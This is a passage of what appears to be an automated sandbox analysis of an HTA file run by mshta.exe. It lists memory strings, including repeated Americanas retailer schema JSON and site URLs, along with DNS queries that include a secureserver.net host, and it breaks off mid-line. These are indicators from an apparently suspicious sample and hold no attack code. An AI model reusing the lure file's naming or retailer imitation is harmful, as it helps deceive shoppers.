Source: mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"} equals www.twitter.com (Twitter)
Source: mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"} equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}P equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}P equals www.twitter.com (Twitter)
Source: mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}P equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}lP equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}lP equals www.twitter.com (Twitter)
Source: mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}lP equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: static.criteo.net
Source: global trafficDNS traffic detected: DNS query: securepubads.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: www.americanas.com.br
Source: global trafficDNS traffic detected: DNS query: images-americanas.b2w.io
Source: global trafficDNS traffic detected: DNS query: statics-americanas.b2w.io
Source: global trafficDNS traffic detected: DNS query: logs-referer.s3-sa-east-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: s3-sa-east-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: 102.57.205.92.host.secureserver.net
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: http://www.americanas.com.br/cartao-americanas
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535775149.000000000530C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539906624.0000000005140000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://americanasadvertising.com/?utm_source=site_marcas_americanas&utm_medium=banner&utm_campaign=
Source: mshta.exe, 00000000.00000003.538977020.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535526908.0000000005340000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://canaldedenuncias.com.br/universoamericanas/
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://carreiras.americanas.com/
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537933006.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542489956.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://cliente.americanas.com.br/minha-conta
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://cliente.americanas.com.br/minha-conta/pedidos
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/scaffolding/ascgcycc:1080:0
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/ascgcycc:1080:0
Source: mshta.exe, 00000000.00000003.538457983.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548280086.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540262182.000000000444A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540049421.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://empresas.americanas.com.br/?chave=brd_hm_ft_0_0_empresas
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540262182.000000000444A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://empresas.americanas.com.br/?chave=brd_hm_mn_0_bottom_bndes
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548511611.000000000514C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539906624.000000000514C000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://empresas.americanas.com.br/?chave=brd_hm_tt_0_0_empresas
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540858944.0000000005D35000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540201462.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 